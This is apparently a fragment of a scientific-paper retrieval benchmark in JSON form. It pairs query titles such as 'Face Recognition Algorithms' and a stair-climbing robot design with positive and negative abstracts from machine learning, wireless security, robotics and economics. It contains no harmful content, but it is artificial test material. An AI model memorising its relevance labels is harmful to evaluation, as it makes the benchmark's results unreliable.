"docid": "71b5c8679979cccfe9cad229d4b7a952",
"text": "Despite widespread adoption, machine learning models remain mostly black boxes. Understanding the reasons behind predictions is, however, quite important in assessing trust, which is fundamental if one plans to take action based on a prediction, or when choosing whether to deploy a new model. Such understanding also provides insights into the model, which can be used to transform an untrustworthy model or prediction into a trustworthy one.\n In this work, we propose LIME, a novel explanation technique that explains the predictions of any classifier in an interpretable and faithful manner, by learning an interpretable model locally varound the prediction. We also propose a method to explain models by presenting representative individual predictions and their explanations in a non-redundant way, framing the task as a submodular optimization problem. We demonstrate the flexibility of these methods by explaining different models for text (e.g. random forests) and image classification (e.g. neural networks). We show the utility of explanations via novel experiments, both simulated and with human subjects, on various scenarios that require trust: deciding if one should trust a prediction, choosing between models, improving an untrustworthy classifier, and identifying why a classifier should not be trusted.",
"title": ""
},
{
"docid": "c056fa934bbf9bc6a286cd718f3a7217",
"text": "The advent of deep sub-micron technology has exacerbated reliability issues in on-chip interconnects. In particular, single event upsets, such as soft errors, and hard faults are rapidly becoming a force to be reckoned with. This spiraling trend highlights the importance of detailed analysis of these reliability hazards and the incorporation of comprehensive protection measures into all network-on-chip (NoC) designs. In this paper, we examine the impact of transient failures on the reliability of on-chip interconnects and develop comprehensive counter-measures to either prevent or recover from them. In this regard, we propose several novel schemes to remedy various kinds of soft error symptoms, while keeping area and power overhead at a minimum. Our proposed solutions are architected to fully exploit the available infrastructures in an NoC and enable versatile reuse of valuable resources. The effectiveness of the proposed techniques has been validated using a cycle-accurate simulator",
"title": ""
},
{
"docid": "6148a8847c01d46931250b959087b1b1",
"text": "Recognizing visual content in unconstrained videos has become a very important problem for many applications. Existing corpora for video analysis lack scale and/or content diversity, and thus limited the needed progress in this critical area. In this paper, we describe and release a new database called CCV, containing 9,317 web videos over 20 semantic categories, including events like \"baseball\" and \"parade\", scenes like \"beach\", and objects like \"cat\". The database was collected with extra care to ensure relevance to consumer interest and originality of video content without post-editing. Such videos typically have very little textual annotation and thus can benefit from the development of automatic content analysis techniques.\n We used Amazon MTurk platform to perform manual annotation, and studied the behaviors and performance of human annotators on MTurk. We also compared the abilities in understanding consumer video content by humans and machines. For the latter, we implemented automatic classifiers using state-of-the-art multi-modal approach that achieved top performance in recent TRECVID multimedia event detection task. Results confirmed classifiers fusing audio and video features significantly outperform single-modality solutions. We also found that humans are much better at understanding categories of nonrigid objects such as \"cat\", while current automatic techniques are relatively close to humans in recognizing categories that have distinctive background scenes or audio patterns.",
"title": ""
},
{
"docid": "b700f3c79d55a2251c84c227104e9eee",
"text": "Recurrent neural network language models (RNNLMs) are becoming increasingly popular for a range of applications inc luding speech recognition. However, an important issue that li mi s the quantity of data, and hence their possible application a reas, is the computational cost in training. A standard appro ach to handle this problem is to use class-based outputs, allowi ng systems to be trained on CPUs. This paper describes an alternative approach that allows RNNLMs to be efficiently trained on GPUs. This enables larger quantities of data to be used, an d networks with an unclustered, full output layer to be traine d. To improve efficiency on GPUs, multiple sentences are “spliced ” together for each mini-batch or “bunch” in training. On a lar ge vocabulary conversational telephone speech recognition t ask, the training time was reduced by a factor of 27 over the standard CPU-based RNNLM toolkit. The use of an unclustered, full output layer also improves perplexity and recognition performance over class-based RNNLMs.",
"title": ""
},
{
"docid": "e5bf5516cdd531b85f02ac258420f5ef",
"text": "Management literature is almost unanimous in suggesting to manufacturers that they should integrate services into their core product offering. The literature, however, is surprisingly sparse in describing to what extent services should be integrated, how this integration should be carried out, or in detailing the challenges inherent in the transition to services. Reports on a study of 11 capital equipment manufacturers developing service offerings for their products. Focuses on identifying the dimensions considered when creating a service organization in the context of a manufacturing ®rm, and successful strategies to navigate the transition. Analysis of qualitative data suggests that the transition involves a deliberate developmental process to build capabilities as ®rms shift the nature of the relationship with the product end-users and the focus of the service offering. The report concludes identifying implications of our ®ndings for further research and practitioners.",
"title": ""
},
{
"docid": "8ecd81f0078666a91a8c4183c2cb5a11",
"text": "Due to the broadcast nature of radio propagation, the wireless air interface is open and accessible to both authorized and illegitimate users. This completely differs from a wired network, where communicating devices are physically connected through cables and a node without direct association is unable to access the network for illicit activities. The open communications environment makes wireless transmissions more vulnerable than wired communications to malicious attacks, including both the passive eavesdropping for data interception and the active jamming for disrupting legitimate transmissions. Therefore, this paper is motivated to examine the security vulnerabilities and threats imposed by the inherent open nature of wireless communications and to devise efficient defense mechanisms for improving the wireless network security. We first summarize the security requirements of wireless networks, including their authenticity, confidentiality, integrity, and availability issues. Next, a comprehensive overview of security attacks encountered in wireless networks is presented in view of the network protocol architecture, where the potential security threats are discussed at each protocol layer. We also provide a survey of the existing security protocols and algorithms that are adopted in the existing wireless network standards, such as the Bluetooth, Wi-Fi, WiMAX, and the long-term evolution (LTE) systems. Then, we discuss the state of the art in physical-layer security, which is an emerging technique of securing the open communications environment against eavesdropping attacks at the physical layer. Several physical-layer security techniques are reviewed and compared, including information-theoretic security, artificial-noise-aided security, security-oriented beamforming, diversity-assisted security, and physical-layer key generation approaches. Since a jammer emitting radio signals can readily interfere with the legitimate wireless users, we also introduce the family of various jamming attacks and their countermeasures, including the constant jammer, intermittent jammer, reactive jammer, adaptive jammer, and intelligent jammer. Additionally, we discuss the integration of physical-layer security into existing authentication and cryptography mechanisms for further securing wireless networks. Finally, some technical challenges which remain unresolved at the time of writing are summarized and the future trends in wireless security are discussed.",
"title": ""
},
{
"docid": "6649b5482a9a5413059ff4f9446223c6",
"text": "The emergence of drug resistance to traditional chemotherapy and newer targeted therapies in cancer patients is a major clinical challenge. Reactivation of the same or compensatory signaling pathways is a common class of drug resistance mechanisms. Employing drug combinations that inhibit multiple modules of reactivated signaling pathways is a promising strategy to overcome and prevent the onset of drug resistance. However, with thousands of available FDA-approved and investigational compounds, it is infeasible to experimentally screen millions of possible drug combinations with limited resources. Therefore, computational approaches are needed to constrain the search space and prioritize synergistic drug combinations for preclinical studies. In this study, we propose a novel approach for predicting drug combinations through investigating potential effects of drug targets on disease signaling network. We first construct a disease signaling network by integrating gene expression data with disease-associated driver genes. Individual drugs that can partially perturb the disease signaling network are then selected based on a drug-disease network \"impact matrix\", which is calculated using network diffusion distance from drug targets to signaling network elements. The selected drugs are subsequently clustered into communities (subgroups), which are proposed to share similar mechanisms of action. Finally, drug combinations are ranked according to maximal impact on signaling sub-networks from distinct mechanism-based communities. Our method is advantageous compared to other approaches in that it does not require large amounts drug dose response data, drug-induced \"omics\" profiles or clinical efficacy data, which are not often readily available. We validate our approach using a BRAF-mutant melanoma signaling network and combinatorial in vitro drug screening data, and report drug combinations with diverse mechanisms of action and opportunities for drug repositioning.",
"title": ""
},
{
"docid": "f30a47ffc303584728e0bdddd1a1c478",
"text": "2 Introduction 1 An intense debate has raged for years over Africa's economic difficulties. Aside from the obvious problems of warfare, drought, and disease, the usual suspect is economic policy. However, the record of over a decade of structural adjustment efforts is difficult to read. A recent analysis by the World Bank provides significant evidence that improved policies lead to improved prospects for growth, and that the continuing economic problems in Africa are the result of a failure to carry liberalization far enough (World Bank 1993a). According to that analysis, no African governments were rated as having \" good \" economic policies and only one, Ghana, was deemed \" adequate; \" with an annual growth rate of 1.3 percent per capita (1987-1991). Opponents of World Bank/IMF policy have criticized the Bank's analysis on numerous grounds, but even World Bank economists mutter that rates of private investment and economic growth are higher in Viet Nam and China (whose economic policies still bear a strong socialist imprint) than almost anywhere in Africa. Something more than standard macroeconomic policy failures must be at work. This paper focuses on one of the \" usual suspects \"-rent seeking by officials at the highest government levels. Based on both theory and concrete African examples, it demonstrates how such rent seeking can harm an economy and stifle investment and growth. \" Rent seeking \" is often used interchangeably with \" corruption, \" and there is a large area of overlap. While corruption involves the misuse of public power for private gain, rent seeking derives from the economic concept of \" rent \"-earnings in excess of all relevant costs (including a market rate of return on invested assets). Rent is equivalent to what most non-economists think of as monopoly 3 profits. Rent seeking is then the effort to acquire access to or control over opportunities for earning rents. These efforts are not necessarily illegal, or even immoral. They include much lobbying and some forms of advertising. Some can be efficient, such as an auction of scare and valuable assets. However, economists and public sector management specialists are concerned with what Jagdish Bhagwati termed \" directly unproductive \" rent seeking activities, because they waste resources and can contribute to economic inefficiency (Bhagwati 1974, see also Krueger 1974). Corruption and other forms of rent seeking have been well-documented in every society on earth, from the banks of the Congo River …",
"title": ""
},
{
"docid": "99ed7c5c5315a74491c26b88bfa60965",
"text": "Data deduplication is one of important data compression techniques for eliminating duplicate copies of repeating data, and has been widely used in cloud storage to reduce the amount of storage space and save bandwidth. To protect the confidentiality of sensitive data while supporting deduplication, the convergent encryption technique has been proposed to encrypt the data before outsourcing. To better protect data security, this paper makes the first attempt to formally address the problem of authorized data deduplication. Different from traditional deduplication systems, the differential privileges of users are further considered in duplicate check besides the data itself. We also present several new deduplication constructions supporting authorized duplicate check in a hybrid cloud architecture. Security analysis demonstrates that our scheme is secure in terms of the definitions specified in the proposed security model. As a proof of concept, we implement a prototype of our proposed authorized duplicate check scheme and conduct testbed experiments using our prototype. We show that our proposed authorized duplicate check scheme incurs minimal overhead compared to normal operations.",
"title": ""
},
{
"docid": "d9e6ebe6d0a4cebddd8e1809377c2552",
"text": "Real-time approach for monocular visual simultaneous localization and mapping (SLAM) within a large-scale environment is proposed. From a monocular video sequence, the proposed method continuously computes the current 6-DOF camera pose and 3D landmarks position. The proposed method successfully builds consistent maps from challenging outdoor sequences using a monocular camera as the only sensor, while existing approaches have utilized additional structural information such as camera height from the ground. By using a binary descriptor and metric-topological mapping, the system demonstrates real-time performance on a large-scale outdoor environment without utilizing GPUs or reducing input image size. The effectiveness of the proposed method is demonstrated on various challenging video sequences including the KITTI dataset and indoor video captured on a micro aerial vehicle.",
"title": ""
},
{
"docid": "3b0a36f6d484705f8a68ae4a928b743e",
"text": "Solution The unique pure strategy subgame perfect equilibrium is (Rr, r). 2. (30pts.) An entrepreneur has a project that she presents to a capitalist. She has her own money that she could invest in the project and is looking for additional funding from the capitalist. The project is either good (denoted g) (with probability p) or it is bad (denoted b) (with probability 1− p) and only the entrepreneur knows the quality of the project. The entrepreneur (E) decides whether to invest her own money (I) or not (N), the capitalist (C) observes whether the entrepreneur has invested or not and then decides whether to invest his money (i) or not (n). Figure 1 represents the game and gives the payoffs, where the first number is the entrepreneur’s payoff and the second number is the capitalist’s. (a) (20pts.) Find the set of pure strategy perfect Bayesian equilibria of this game.",
"title": ""
},
{
"docid": "f829097794802117bf37ea8ce891611a",
"text": "Manually crafted combinatorial features have been the \"secret sauce\" behind many successful models. For web-scale applications, however, the variety and volume of features make these manually crafted features expensive to create, maintain, and deploy. This paper proposes the Deep Crossing model which is a deep neural network that automatically combines features to produce superior models. The input of Deep Crossing is a set of individual features that can be either dense or sparse. The important crossing features are discovered implicitly by the networks, which are comprised of an embedding and stacking layer, as well as a cascade of Residual Units. Deep Crossing is implemented with a modeling tool called the Computational Network Tool Kit (CNTK), powered by a multi-GPU platform. It was able to build, from scratch, two web-scale models for a major paid search engine, and achieve superior results with only a sub-set of the features used in the production models. This demonstrates the potential of using Deep Crossing as a general modeling paradigm to improve existing products, as well as to speed up the development of new models with a fraction of the investment in feature engineering and acquisition of deep domain knowledge.",
"title": ""
},
{
"docid": "cf2e54d22fbf261a51a226f7f5adc4f5",
"text": "We propose a new fast, robust and controllable method to simulate the dynamic destruction of large and complex objects in real time. The common method for fracture simulation in computer games is to pre-fracture models and replace objects by their pre-computed parts at run-time. This popular method is computationally cheap but has the disadvantages that the fracture pattern does not align with the impact location and that the number of hierarchical fracture levels is fixed. Our method allows dynamic fracturing of large objects into an unlimited number of pieces fast enough to be used in computer games. We represent visual meshes by volumetric approximate convex decompositions (VACD) and apply user-defined fracture patterns dependent on the impact location. The method supports partial fracturing meaning that fracture patterns can be applied locally at multiple locations of an object. We propose new methods for computing a VACD, for approximate convex hull construction and for detecting islands in the convex decomposition after partial destruction in order to determine support structures.",
"title": ""
},
{
"docid": "7476aafb8ceff37ab941c7b1d57d7c2b",
"text": "In recent two decades, artificial neural networks have been extensively used in many business applications. Despite the growing number of research papers, only few studies have been presented focusing on the overview of published findings in this important and popular area. Moreover, the majority of these reviews was introduced more than 15 years ago. The aim of this work is to expand the range of earlier surveys and provide a systematic overview of neural network applications in business between 1994 and 2015. We have covered a total of 412 articles and classified them according to the year of publication, application area, type of neural network, learning algorithm, benchmark method, citations and journal. Our investigation revealed that most of the research has aimed at financial di tress and bankruptcy problems, stock price forecasting, and decision support, with special attention to classification tasks. Besides conventional multilayer feedforward network with gradient descent backpropagation, various hybrid networks have been developed in order to improve the performance of standard models. Even though neural networks have been established as wellknown method in business, there is enormous space for additional research in order to improve their functioning and increase our understanding of this influential area.",
"title": ""
}
] | scidocsrr |
e21fd0d1c614d69bf0aa58088f4c67bb | Face Recognition Algorithms | [
{
"docid": "4a9ad387ad16727d9ac15ac667d2b1c3",
"text": "In recent years face recognition has received substantial attention from both research communities and the market, but still remained very challenging in real applications. A lot of face recognition algorithms, along with their modifications, have been developed during the past decades. A number of typical algorithms are presented, being categorized into appearancebased and model-based schemes. For appearance-based methods, three linear subspace analysis schemes are presented, and several non-linear manifold analysis approaches for face recognition are briefly described. The model-based approaches are introduced, including Elastic Bunch Graph matching, Active Appearance Model and 3D Morphable Model methods. A number of face databases available in the public domain and several published performance evaluation results are digested. Future research directions based on the current recognition results are pointed out.",
"title": ""
}
] | [
{
"docid": "11f84f99de269ca5ca43fc6d761504b7",
"text": "Effective use of distributed collaboration environments requires shared mental models that guide users in sensemaking and categorization. In Lotus Notes -based collaboration systems, such shared models are usually implemented as views and document types. TeamRoom, developed at Lotus Institute, implements in its design a theory of effective social process that creates a set of team-specific categories, which can then be used as a basis for knowledge sharing, collaboration, and team memory. This paper reports an exploratory study in collective concept formation in the TeamRoom environment. The study was run in an ecological setting, while the team members used the system for their everyday work. We apply theory developed by Lev Vygotsky, and use a modified version of an experiment on concept formation, devised by Lev Sakharov, and discussed in Vygotsky (1986). Vygotsky emphasized the role of language, cognitive artifacts, and historical and social sources in the development of thought processes. Within the Vygotskian framework it becomes clear that development of thinking does not end in adolescence. In teams of adult people, learning and knowledge creation are continuous processes. New concepts are created, shared, and developed into systems. The question, then, becomes how spontaneous concepts are collectively generated in teams, how they become integrated as systems, and how computer mediated collaboration environments affect these processes. d in ittle ons",
"title": ""
},
{
"docid": "fd5efb029ab7f69f73a97f567ac9aa1a",
"text": "Current offshore wind farms (OWFs) design processes are based on a sequential approach which does not guarantee system optimality because it oversimplifies the problem by discarding important interdependencies between design aspects. This article presents a framework to integrate, automate and optimize the design of OWF layouts and the respective electrical infrastructures. The proposed framework optimizes simultaneously different goals (e.g., annual energy delivered and investment cost) which leads to efficient trade-offs during the design phase, e.g., reduction of wake losses vs collection system length. Furthermore, the proposed framework is independent of economic assumptions, meaning that no a priori values such as the interest rate or energy price, are needed. The proposed framework was applied to the Dutch Borssele areas I and II. A wide range of OWF layouts were obtained through the optimization framework. OWFs with similar energy production and investment cost as layouts designed with standard sequential strategies were obtained through the framework, meaning that the proposed framework has the capability to create different OWF layouts that would have been missed by the designers. In conclusion, the proposed multi-objective optimization framework represents a mind shift in design tools for OWFs which allows cost savings in the design and operation phases.",
"title": ""
},
{
"docid": "cff8ae2635684a6f0e07142175b7fbf1",
"text": "Collaborative writing is on the increase. In order to write well together, authors often need to be aware of who has done what recently. We offer a new tool, DocuViz, that displays the entire revision history of Google Docs, showing more than the one-step-at-a-time view now shown in revision history and tracking changes in Word. We introduce the tool and present cases in which the tool has the potential to be useful: To authors themselves to see recent \"seismic activity,\" indicating where in particular a co-author might want to pay attention, to instructors to see who has contributed what and which changes were made to comments from them, and to researchers interested in the new patterns of collaboration made possible by simultaneous editing capabilities.",
"title": ""
},
{
"docid": "bfa659ff24af7c319702a6a8c0c7dca3",
"text": "In this letter, a grounded coplanar waveguide-to-microstrip (GCPW-to-MS) transition without via holes is presented. The transition is designed on a PET® substrate and fabricated using inkjet printing technology. To our knowledge, fabrication of transitions using inkjet printing technology has not been reported in the literature. The simulations have been performed using HFSS® software and the measurements have been carried out using a Vector Network Analyzer on a broad frequency band from 40 to 85 GHz. The effect of varying several geometrical parameters of the GCPW-to-MS on the electromagnetic response is also presented. The results obtained demonstrate good characteristics of the insertion loss better than 1.5 dB, and return loss larger than 10 dB in the V-band (50-75 GHz). Such transitions are suitable for characterization of microwave components built on different flexible substrates.",
"title": ""
},
{
"docid": "4cb34eda6145a8ea0ccc22b3e547b5e5",
"text": "The factors that contribute to individual differences in the reward value of cute infant facial characteristics are poorly understood. Here we show that the effect of cuteness on a behavioural measure of the reward value of infant faces is greater among women reporting strong maternal tendencies. By contrast, maternal tendencies did not predict women's subjective ratings of the cuteness of these infant faces. These results show, for the first time, that the reward value of infant facial cuteness is greater among women who report being more interested in interacting with infants, implicating maternal tendencies in individual differences in the reward value of infant cuteness. Moreover, our results indicate that the relationship between maternal tendencies and the reward value of infant facial cuteness is not due to individual differences in women's ability to detect infant cuteness. This latter result suggests that individual differences in the reward value of infant cuteness are not simply a by-product of low-cost, functionless biases in the visual system.",
"title": ""
},
{
"docid": "7f48835a746d23edbdaa410800d0d322",
"text": "Nager syndrome, or acrofacial dysostosis type 1 (AFD1), is a rare multiple malformation syndrome characterized by hypoplasia of first and second branchial arches derivatives and appendicular anomalies with variable involvement of the radial/axial ray. In 2012, AFD1 has been associated with dominant mutations in SF3B4. We report a 22-week-old fetus with AFD1 associated with diaphragmatic hernia due to a previously unreported SF3B4 mutation (c.35-2A>G). Defective diaphragmatic development is a rare manifestation in AFD1 as it is described in only 2 previous cases, with molecular confirmation in 1 of them. Our molecular finding adds a novel pathogenic splicing variant to the SF3B4 mutational spectrum and contributes to defining its prenatal/fetal phenotype.",
"title": ""
},
{
"docid": "f3c8158351811c2c9fc0ff2a128d35e0",
"text": "A new feather mite species, Picalgoides giganteus n. sp. (Psoroptoididae: Pandalurinae), is described from the tawny-throated leaftosser Sclerurus mexicanus Sclater (Passeriformes: Furnariidae) in Costa Rica. Among the 10 species of Picalgoides Černý, 1974, including the new one, this is the third recorded from a passerine host; the remaining seven nominal species are associated with hosts of the order Piciformes. Brief data on the host-parasite associations of Picalgoides spp. are provided. Megninia megalixus Trouessart, 1885 from the short-tailed green magpie Cissa thalassina (Temminck) is transferred to Picalgoides as P. megalixus (Trouessart, 1885) n. comb.",
"title": ""
},
{
"docid": "d98b97dae367d57baae6b0211c781d66",
"text": "In this paper we describe a technology for protecting privacy in video systems. The paper presents a review of privacy in video surveillance and describes how a computer vision approach to understanding the video can be used to represent “just enough” of the information contained in a video stream to allow video-based tasks (including both surveillance and other “person aware” applications) to be accomplished, while hiding superfluous details, particularly identity, that can contain privacyintrusive information. The technology has been implemented in the form of a privacy console that manages operator access to different versions of the video-derived data according to access control lists. We have also built PrivacyCam—a smart camera that produces a video stream with the privacy-intrusive information already removed.",
"title": ""
},
{
"docid": "17fde1b7ed30db50790192ea03de2dd1",
"text": "Parsing for clothes in images and videos is a critical step towards understanding the human appearance. In this work, we propose a method to segment clothes in settings where there is no restriction on number and type of clothes, pose of the person, viewing angle, occlusion and number of people. This is a challenging task as clothes, even of the same category, have large variations in color and texture. The presence of human joints is the best indicator for cloth types as most of the clothes are consistently worn around the joints. We incorporate the human joint prior by estimating the body joint distributions using the detectors and learning the cloth-joint co-occurrences of different cloth types with respect to body joints. The cloth-joint and cloth-cloth co-occurrences are used as a part of the conditional random field framework to segment the image into different clothing. Our results indicate that we have outperformed the recent attempt [16] on H3D [3], a fairly complex dataset.",
"title": ""
},
{
"docid": "77a1198ac77a385ef80f5fb0accd1a59",
"text": "An enterprise resource planning system (ERP) is the information backbone of a company that integrates and automates all business operations. It is a critical issue to select the suitable ERP system which meets all the business strategies and the goals of the company. This study presents an approach to select a suitable ERP system for textile industry. Textile companies have some difficulties to implement ERP systems such as variant structure of products, production variety and unqualified human resources. At first, the vision and the strategies of the organization are checked by using balanced scorecard. According to the company’s vision, strategies and KPIs, we can prepare a request for proposal. Then ERP packages that do not meet the requirements of the company are eliminated. After strategic management phase, the proposed methodology gives advice before ERP selection. The criteria were determined and then compared according to their importance. The rest ERP system solutions were selected to evaluate. An external evaluation team consisting of ERP consultants was assigned to select one of these solutions according to the predetermined criteria. In this study, the fuzzy analytic hierarchy process, a fuzzy extension of the multi-criteria decision-making technique AHP, was used to compare these ERP system solutions. The methodology was applied for a textile manufacturing company. 2008 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "dabcbdf63b15dff1153aad4b06303269",
"text": "In this chapter we present an overview of Web personalization process viewed as an application of data mining requiring support for all the phases of a typical data mining cycle. These phases include data collection and preprocessing, pattern discovery and evaluation, and finally applying the discovered knowledge in real-time to mediate between the user and the Web. This view of the personalization process provides added flexibility in leveraging multiple data sources and in effectively using the discovered models in an automatic personalization system. The chapter provides a detailed discussion of a host of activities and techniques used at different stages of this cycle, including the preprocessing and integration of data from multiple sources, as well as pattern discovery techniques that are typically applied to this data. We consider a number of classes of data mining algorithms used particularly for Web personalization, including techniques based on clustering, association rule discovery, sequential pattern mining, Markov models, and probabilistic mixture and hidden (latent) variable models. Finally, we discuss hybrid data mining frameworks that leverage data from a variety of channels to provide more effective personalization solutions.",
"title": ""
},
{
"docid": "57ff834b30f5e0f31c3382fed9c2a8ee",
"text": "Today's vehicles are becoming cyber-physical systems that not only communicate with other vehicles but also gather various information from hundreds of sensors within them. These developments help create smart and connected (e.g., self-driving) vehicles that will introduce significant information to drivers, manufacturers, insurance companies, and maintenance service providers for various applications. One such application that is becoming crucial with the introduction of self-driving cars is forensic analysis of traffic accidents. The utilization of vehicle-related data can be instrumental in post-accident scenarios to discover the faulty party, particularly for self-driving vehicles. With the opportunity of being able to access various information in cars, we propose a permissioned blockchain framework among the various elements involved to manage the collected vehicle-related data. Specifically, we first integrate vehicular public key infrastructure (VPKI) to the proposed blockchain to provide membership establishment and privacy. Next, we design a fragmented ledger that will store detailed data related to vehicles such as maintenance information/ history, car diagnosis reports, and so on. The proposed forensic framework enables trustless, traceable, and privacy-aware post-accident analysis with minimal storage and processing overhead.",
"title": ""
},
{
"docid": "30e89edb65cbf54b27115c037ee9c322",
"text": "AbstructIGBT’s are available with short-circuit withstand times approaching those of bipolar transistors. These IGBT’s can therefore be protected by the same relatively slow-acting circuitry. The more efficient IGBT’s, however, have lower shortcircuit withstand times. While protection of these types of IGBT’s is not difficult, it does require a reassessment of the traditional protection methods used for the bipolar transistors. An in-depth discussion on the behavior of IGBT’s under different short-circuit conditions is carried out and the effects of various parameters on permissible short-circuit time are analyzed. The paper also rethinks the problem of providing short-circuit protection in relation to the special characteristics of the most efficient IGBT’s. The pros and cons of some of the existing protection circuits are discussed and, based on the recommendations, a protection scheme is implemented to demonstrate that reliable short-circuit protection of these types of IGBT’s can be achieved without difficulty in a PWM motor-drive application. volts",
"title": ""
},
{
"docid": "260b39661df5cb7ddb9c4cf7ab8a36ba",
"text": "Deblurring camera-based document image is an important task in digital document processing, since it can improve both the accuracy of optical character recognition systems and the visual quality of document images. Traditional deblurring algorithms have been proposed to work for natural-scene images. However the natural-scene images are not consistent with document images. In this paper, the distinct characteristics of document images are investigated. We propose a content-aware prior for document image deblurring. It is based on document image foreground segmentation. Besides, an upper-bound constraint combined with total variation based method is proposed to suppress the rings in the deblurred image. Comparing with the traditional general purpose deblurring methods, the proposed deblurring algorithm can produce more pleasing results on document images. Encouraging experimental results demonstrate the efficacy of the proposed method.",
"title": ""
},
{
"docid": "1bb5e01e596d09e4ff89d7cb864ff205",
"text": "A number of recent approaches have used deep convolutional neural networks (CNNs) to build texture representations. Nevertheless, it is still unclear how these models represent texture and invariances to categorical variations. This work conducts a systematic evaluation of recent CNN-based texture descriptors for recognition and attempts to understand the nature of invariances captured by these representations. First we show that the recently proposed bilinear CNN model [25] is an excellent generalpurpose texture descriptor and compares favorably to other CNN-based descriptors on various texture and scene recognition benchmarks. The model is translationally invariant and obtains better accuracy on the ImageNet dataset without requiring spatial jittering of data compared to corresponding models trained with spatial jittering. Based on recent work [13, 28] we propose a technique to visualize pre-images, providing a means for understanding categorical properties that are captured by these representations. Finally, we show preliminary results on how a unified parametric model of texture analysis and synthesis can be used for attribute-based image manipulation, e.g. to make an image more swirly, honeycombed, or knitted. The source code and additional visualizations are available at http://vis-www.cs.umass.edu/texture.",
"title": ""
},
{
"docid": "43e831b69559ae228bae68b369dac2e3",
"text": "Virtualization technology enables Cloud providers to efficiently use their computing services and resources. Even if the benefits in terms of performance, maintenance, and cost are evident, however, virtualization has also been exploited by attackers to devise new ways to compromise a system. To address these problems, research security solutions have evolved considerably over the years to cope with new attacks and threat models. In this work, we review the protection strategies proposed in the literature and show how some of the solutions have been invalidated by new attacks, or threat models, that were previously not considered. The goal is to show the evolution of the threats, and of the related security and trust assumptions, in virtualized systems that have given rise to complex threat models and the corresponding sophistication of protection strategies to deal with such attacks. We also categorize threat models, security and trust assumptions, and attacks against a virtualized system at the different layers—in particular, hardware, virtualization, OS, and application.",
"title": ""
},
{
"docid": "cca94491276328a03e0a56e7460bf50f",
"text": "Because of large amounts of unstructured data generated on the Internet, entity relation extraction is believed to have high commercial value. Entity relation extraction is a case of information extraction and it is based on entity recognition. This paper firstly gives a brief overview of relation extraction. On the basis of reviewing the history of relation extraction, the research status of relation extraction is analyzed. Then the paper divides theses research into three categories: supervised machine learning methods, semi-supervised machine learning methods and unsupervised machine learning method, and toward to the deep learning direction.",
"title": ""
},
{
"docid": "b38939ec3c6f8e10553f934ceab401ff",
"text": "According to recent work in the new field of lexical pragmatics, the meanings of words are frequently pragmatically adjusted and fine-tuned in context, so that their contribution to the proposition expressed is different from their lexically encoded sense. Well-known examples include lexical narrowing (e.g. ‘drink’ used to mean ALCOHOLIC DRINK), approximation (or loosening) (e.g. ‘flat’ used to mean RELATIVELY FLAT) and metaphorical extension (e.g. ‘bulldozer’ used to mean FORCEFUL PERSON). These three phenomena are often studied in isolation from each other and given quite distinct kinds of explanation. In this chapter, we will propose a more unified account. We will try to show that narrowing, loosening and metaphorical extension are simply different outcomes of a single interpretive process which creates an ad hoc concept, or occasion-specific sense, based on interaction among encoded concepts, contextual information and pragmatic expectations or principles. We will outline an inferential account of the lexical adjustment process using the framework of relevance theory, and compare it with some alternative accounts. * This work is part of an AHRC-funded project ‘A Unified Theory of Lexical Pragmatics’ (AR16356). We are grateful to our research assistants, Patricia Kolaiti, Tim Wharton and, in particular, Rosa Vega Moreno, whose PhD work on metaphor we draw on in this paper, and to Vladimir Žegarac, François Recanati, Nausicaa Pouscoulous, Paula Rubio Fernandez and Hanna Stoever, for helpful discussions. We would also like to thank Dan Sperber for sharing with us many valuable insights on metaphor and on lexical pragmatics more generally.",
"title": ""
},
{
"docid": "170cd125882865150428b521d6220929",
"text": "In this paper, we propose a novel approach for action classification in soccer videos using a recurrent neural network scheme. Thereby, we extract from each video action at each timestep a set of features which describe both the visual content (by the mean of a BoW approach) and the dominant motion (with a key point based approach). A Long Short-Term Memory-based Recurrent Neural Network is then trained to classify each video sequence considering the temporal evolution of the features for each timestep. Experimental results on the MICC-Soccer-Actions-4 database show that the proposed approach outperforms classification methods of related works (with a classification rate of 77 %), and that the combination of the two features (BoW and dominant motion) leads to a classification rate of 92 %.",
"title": ""
},
{
"docid": "088d6f1cd3c19765df8a16cd1a241d18",
"text": "Legged robots need to be able to classify and recognize different terrains to adapt their gait accordingly. Recent works in terrain classification use different types of sensors (like stereovision, 3D laser range, and tactile sensors) and their combination. However, such sensor systems require more computing power, produce extra load to legged robots, and/or might be difficult to install on a small size legged robot. In this work, we present an online terrain classification system. It uses only a monocular camera with a feature-based terrain classification algorithm which is robust to changes in illumination and view points. For this algorithm, we extract local features of terrains using either Scale Invariant Feature Transform (SIFT) or Speed Up Robust Feature (SURF). We encode the features using the Bag of Words (BoW) technique, and then classify the words using Support Vector Machines (SVMs) with a radial basis function kernel. We compare this feature-based approach with a color-based approach on the Caltech-256 benchmark as well as eight different terrain image sets (grass, gravel, pavement, sand, asphalt, floor, mud, and fine gravel). For terrain images, we observe up to 90% accuracy with the feature-based approach. Finally, this online terrain classification system is successfully applied to our small hexapod robot AMOS II. The output of the system providing terrain information is used as an input to its neural locomotion control to trigger an energy-efficient gait while traversing different terrains.",
"title": ""
}
] | scidocsrr |
b40b2f5cc8166c6ee058c1c756d18a9d | ‘TuskBot’: Design of the mobile stair climbing 2 by 2 wheels robot platform with novel passive structure ‘Tusk’ | [
{
"docid": "1914a215d1b937f544a60890f167dd49",
"text": "In our paper we present an innovative locomotion concept for rough terrain based on six motorized wheels. Using rhombus configuration, the rover named Shrimp has a steering wheel in the front and the rear, and two wheels arranged on a bogie on each side. The front wheel has a spring suspension to guarantee optimal ground contact of all wheels at any time. The steering of the rover is realized by synchronizing the steering of the front and rear wheels and the speed difference of the bogie wheels. This allows for precision maneuvers and even turning on the spot with minimum slippage. The use of parallel articulations for the front wheel and the bogies enables to set a virtual center of rotation at the level of or below the wheel axis. This insures maximum stability and climbing abilities even for very low friction coefficients between the wheel and the ground. A well functioning prototype has been designed and manufactured. It shows excellent performance surpassing our expectations. The robot, measuring only about 60 cm in length and 20 cm in height, is able to passively overcome obstacles of up to two times its wheel diameter and can climb stairs with steps of over 20 cm. © 2002 Elsevier Science B.V. All rights reserved.",
"title": ""
}
] | [
{
"docid": "7d3f0c22674ac3febe309c2440ad3d90",
